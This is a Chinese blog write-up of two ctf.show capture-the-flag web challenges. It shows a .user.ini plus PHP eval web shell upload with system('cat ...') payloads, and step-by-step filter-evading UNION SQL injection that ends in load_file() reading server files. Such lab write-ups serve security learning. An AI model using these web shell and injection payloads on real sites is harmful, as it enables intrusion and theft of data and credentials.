ctf.show web 13-14 writeup

最新推荐文章于 2024-07-05 23:15:43 发布
最新推荐文章于 2024-07-05 23:15:43 发布
阅读量889 收藏
点赞数 1
分类专栏: CTF刷题记录 文章标签: mysql 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/113861268
版权

ctf.show web 13-14 writeup

目录

web13

解题过程

源码泄露:

解题步骤

web14

解题过程

代码审计

访问隐藏文件

绕过防护的方法

load_file()函数

相关资料:

web13

解题过程

打开题目如下,应该与文件上传漏洞有关。

当时做的时候,按照常规流程做了一些尝试,尝试上传了php文件,图片马等等,发现后端把php后缀的文件过滤了,同时对文件的大小有一定的限制。

源码泄露:

<?php 
	header("content-type:text/html;charset=utf-8");
	$filename = $_FILES['file']['name'];
	$temp_name = $_FILES['file']['tmp_name'];
	$size = $_FILES['file']['size'];
	$error = $_FILES['file']['error'];
	$arr = pathinfo($filename);
	$ext_suffix = $arr['extension'];
	if ($size > 24){
		die("error file zise");
	}
	if (strlen($filename)>9){
		die("error file name");
	}
	if(strlen($ext_suffix)>3){
		die("error suffix");
	}
	if(preg_match("/php/i",$ext_suffix)){
		die("error suffix");
    }
    if(preg_match("/php/i"),$filename)){
        die("error file name");
    }
	if (move_uploaded_file($temp_name, './'.$filename)){
		echo "文件上传成功!";
	}else{
		echo "文件上传失败!";
	}

 ?>

从源码中,我们可以知道对文件的大小,文件的名字长度,后缀名都做了限制。这样的话我们可以从之前checkin题目中寻找灵感( checkin题目wp传送门 ),先上传.user.ini文件,再上传所包含的文件(比如b.txt)

 

解题步骤

1.先上传.user.ini,内容为

auto_prepend_file=b.txt

2.然后上传b.txt,这样的话,每次调用php文件,都会自动包含b.txt文件,b.txt文件的内容为,内容太长会引起报错

<?php
eval($_GET['c']);

这里在checkin那个题目可以用菜刀,但是博主在实践的时候菜刀链接成功,但是没有其他文件的访问权限,所以在这个题目中推荐下面这个找flag的做法。

3.首先把目录文件找出来:下面这个多试几次,我当时试了好多次,差点自闭

?c=print_r(glob("*"));

甚至又重新上传了几次这两个文件,最终实验成功,

4. flag应该就在比较长的文件中了,highlight_file()该文件,

?c=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');

5.也可以用system()命令

?c=system('cat 903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');

flag在f12中

web14

题目:

解题过程

打开题目,开始代码审计,

代码审计

 <?php
include("secret.php");

if(isset($_GET['c'])){
    $c = intval($_GET['c']);
    sleep($c);
    switch ($c) {
        case 1:
            echo '$url';
            break;
        case 2:
            echo '@A@';
            break;
        case 555555:
            echo $url;
        case 44444:
            echo "@A@";
            break;
        case 3333:
            echo $url;
            break;
        case 222:
            echo '@A@';
            break;
        case 222:
            echo '@A@';
            break;
        case 3333:
            echo $url;
            break;
        case 44444:
            echo '@A@';
        case 555555:
            echo $url;
            break;
        case 3:
            echo '@A@';
        case 6000000:
            echo "$url";
        case 1:
            echo '@A@';
            break;
    }
}

highlight_file(__FILE__);

学过c语言的应该都了解case得运行机制,传值?c=3,

跳到case 3 之后,echo '@A@';

因为没有break,会接着运行下一条,echo "$url";

然后又没有break,接着运行echo '@A@'   ,break;等待3秒,回显

访问隐藏文件

访问here_1s_your_f1ag.php,跳转到一个新的界面

注意url,可以看出是get传值,变量名为query

遇到这个当即想到可能与sql注入有关.同时在网页源码中发现了一些提示

if(preg_match('/information_schema\.tables|information_schema\.columns|linestring| |polygon/is', $_GET['query'])){
		die('@A@');
	}

对information_schema.tables,information_schema.columns,linestring,空格,polygon进行了过滤。

绕过防护的方法

1.可以使用/**/代替空格进行绕过

2.反引号 ``       反引号解释原文传送门

反引号:它是为了区分MYSQL的保留字与普通字符而引入的符号。

注意划重点:有MYSQL保留字作为字段的,必须加上反引号来区分!!!

所谓的保留字就是select database insert 这一类数据库的sql指令,当我们不得已要拿他们来做表名和字段名的时候 我们必须要加反引号来避免编译器把这部分认为是保留字而产生错误。

 所以information_schema.tables,information_schema.`tables`      两者在使用效果上无差

判断注入类型

?query=1/**/1=1#      没有报错,同时有如下回显

?query=1/**/and/**/1=3#    没有报错,同时回显不相同

所以判断注入类型为数字型

判断字段数

?query=1/**/order/**/by/**/1#

?query=1/**/order/**/by/**/2#

判断字段数为1

爆库名

?query=121/**/union/**/select/**/database()#

回显

爆表名

?query=121/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema=database()#

爆列名

?query=121/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.`columns`/**/where/**/table_name='content'#

爆字段名

?query=121/**/union/**/select/**/group_concat(0x7a,id,0x7a,username,0x7a,password)/**/from/**/content#

看来它并不想我们这么容易地拿到flag.......

注意观察 ,在显示的一串字符中有这样的语句   secret has a secret...

load_file()函数

(解释来源于百度,结尾链接有一个load_file()函数在注入中的应用

  • Load_file函数的功能是读取文件并返回文件内容为字符串。

    要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。 该文件所有字节可读,但文件内容必须小于max_allowed_packet。

  • 2

    如果该文件不存在或无法读取,因为前面的条件之一不满足,函数返回 NULL。

    在MySQL5.0.19,character_set_filesystem系统变量控制文件名的解释,即仅作文字字符串。

  • 3

    例子:

    mysql> UPDATE table_test    

            -> SET blob_col=LOAD_FILE('/tmp/picture')

            -> WHERE id=1;

  • 4

    或者

    update eugene set article=load_file('D:\eugene.txt')where title='eugene';

读取secret.php文件

在f12中,在script标签中,找到代码

<?php
$url = 'here_1s_your_f1ag.php';
$file = '/tmp/gtf1y';
if(trim(@file_get_contents($file)) === 'ctf.show'){
	echo file_get_contents('/real_flag_is_here');
}')

如果/tmp/gtf1y中的值与ctf.show相同,则输出/real_flag_is_here中的值,我们可以用load_file()函数直接输出/real_flag_is_here中的值即可

?query=121/**/union/**/select/**/load_file('/real_flag_is_here')

相关资料:

1.mysql注入中load_file()函数的应用

2.load_file()函数简介

Sk1y
关注
专栏目录
文件的读写基本操作
范高伦的博客
09-07 1万+
一、文件是计算机中数据持久化存储的表现形式 读写文件标准操作格式1: 1、打开文件:file1 = open('文件名','读写模式') 2、操作文件 3、关闭文件:file1.close() 文件操作完毕后必须关闭,否则长期保持对文件的连接状态,造成内存溢出的现象发生 读写文件操作格式2: # 1、打开文件 file1 = open('demo.txt','w') # 2、操作文件 file1.write('hello world') # 3、关闭文件 file1.close() 1、打开文件:wi
Rsync工作原理
weixin_33819479的博客
06-13 183
  一 Rsync 1)软件简介 Rsync 是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件。Rsync 本来是用以取代rcp 的一个工具,它当前由 Rsync.samba.org 维护。Rsync 使用所谓的“Rsync 演算法”来使本地和远程两个主机之间的文件达到同步,这个算法只传送两个文件的不同部分,而不是每次都整份传送,因此速度相当快。运行 Rsync se...
CTFSHOW 萌新web13
最新发布
weixin_44833249的博客
07-05 145
冒号这个过滤可以用?>来绕过,让程序运行到这里就终止,而在php中,最后一句话是不需要用分号;相比于12题 多了冒号:,点.file的匹配。
向文件in.txt中写入字符串HelloWorld。
Acceleration_的博客
03-20 5898
#include<stdio.h> void solve() { /********** Begin *********/ FILE * pfile = fopen("in.txt","w"); fprintf(pfile,"HelloWorld"); fclose(pfile); /********** End **********/ }
Golang读写文件
umgsai的专栏
05-22 740
使用带缓冲区的方式读取文件 package main import ( "bufio" "fmt" "io" "os" ) func main() { file, err := os.Open("/Users/shangyidong/Downloads/test.txt") if err != nil { fmt.Printf("open file error:%v\n", err) return } // 函数结束前关闭文件 defer file.Close() fmt
golang的文件读写操作
weixin_44684942的博客
07-13 1113
golang的io的一些基本操作
Tamevic’s Ctf-Web writeup@BUUCTF Web合集(更新中...)
Tamevic的博客
06-20 922
Tamevic’s Ctf-Web writeup@BUUCTF Web 前言 大学所有课程都结束了,接下来还有考试和其他一些安排就要毕业了。从大二开始一直在说什么时候能有大块空闲时间好好学学ctf,但是课程安排比较紧张,一直没得空。现在好不容易有了大块时间,说开始就开始。 这次选择BUUCTF的Web题,这里题目基本都是历年各大赛事的原题,质量比较高,便于积累。 HCTF2018 WarmUp 环境一起就是一个滑稽…查看源码,提示去看source.php source.php里是源码 经过百度得知这
CTFshow-Web入门writeup
m0_61596829的博客
06-08 607
CTFshow-Web入门writeup
ctf.show web3 文件包含+php伪协议+命令执行
m0_46412682的博客
07-12 2292
ctf.show web3 php伪协议+文件包含+命令执行 题目的提示: 一开始的页面: 看到这个语句,那就是文件包含了,先试下file:////etc/passwd,有反应 试下有没有flag.txt文件,好像没有这个文件 那现在我们利用php伪协议 php://input post提交命令,这里不知道为什么我用hackerbar post提交没有反应,那只能burp抓包咯,利用命令执行 ls,查看当前有啥文件 这里出现了一个ctf_go_go_go,那我们用cat打开 flag{a1b1cd4e-
BugkuCTF——最新webwriteup(持续更新)
1匹黑马
11-16 3785
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
【CTF解题】BCTF2018-houseofatum-Writeup题解
HBohan的博客
10-14 422
先把ld和Libc给换成题目给的 patchelf --set-interpreter ./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/ld-2.26.so --replace-needed ./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6 ./glibc-all-in-one/libs/2.26- 0ubuntu2_amd64/libc-2.26.so houseofAtum 程序分析 这里只进行一些.
Rsync工作原理及配置步骤(Xmind导图)
wuhanyeah
06-27 696
链接:https://pan.baidu.com/s/1Jmv-kiLPIkdhC-Q1Tvq6AQ 密码:eyzl链接永久有效,如未知消失,请向作者索取。
golang文件读写操作
abcnull 的博客
05-29 1007
文章目录 golang 常用输入输出 常用:读取文件成 []byte 一种是生成 File,再利用 File 读或者写;另一种通过 ioutil 包直接对某路径下文件进行读写 // 依据相对路径拿到 *File 类型 jsonFile, err := os.Open(path) defer jsonFile.Close() // 将读取的文件读成 []byte jsonData, err := ioutil.ReadAll(jsonFile) // 通过序列化机制,把 []byte 转成特定结构 struc
rsync原理
顺其自然~专栏
09-22 183
Rsync(remote synchronize)是一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件。Rsync使用所谓的“”来使本地和远程两个主机之间的文件达到同步,这个算法只传送两个文件的不同部分,而不是每次都整份传送,因此速度相当快。
python读取文件筛选特定信息_python-用正则表达式筛选文本信息
weixin_39805883的博客
11-21 966
【摘要】 本文主要介绍如何对多个文本进行读取,并采用正则表达式对其中的信息进行筛选,将筛选出来的信息存写到一个新文本。打开文件:open(‘文件名’,‘打开方式’)>>>file=open(r'C:\Users\yuanlei\Desktop\mytxt.txt','w+').为避免报错,在文件名的引号前加个r.文件打开方式:只读——r或rt,rb为二进制文件;打开文件前清空文件内容——w或wt...
rsync算法原理和工作流程分析
weixin_33725239的博客
07-24 296
本文通过示例详细分析rsync算法原理和rsync的工作流程,是对rsync官方技术报告和官方推荐文章的解释。本文不会介绍如何使用rsync命令(见rsync基本用法),而是详细解释它如何实现高效的增量传输。 以下是rsync系列篇:   1.rsync(一):基本命令和用法   2.rsync(二):inotify+rsync详细说明和sersync   3.rsync算法原理和工...
mysql messagefile_kali linux 安装 Mysql Can't read from messagefile 报错解决方案
weixin_35773019的博客
01-19 383
1.下载安装包或者wgethttp://dev.mysql.com/get/Downloads/MySQL-5.6/mysql-5.6.33-linux-glibc2.5-x86_64.tar.gzmysql-5.6.33-linux-glibc2.5-x86_64.tar.gz2.创建Mysql 系统用户root@kali:~# groupadd mysqlroot@kali:~# usera...
向文件in.txt中写入字符串HelloWorld ——C语言实现
qq_58476985的博客
01-26 5243
平台会对你编写的代码进行测试,若与预期输出一致,则算通关。处补充代码,完成本关要求。根据提示,在右侧编辑器。
ctf.show_web5
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值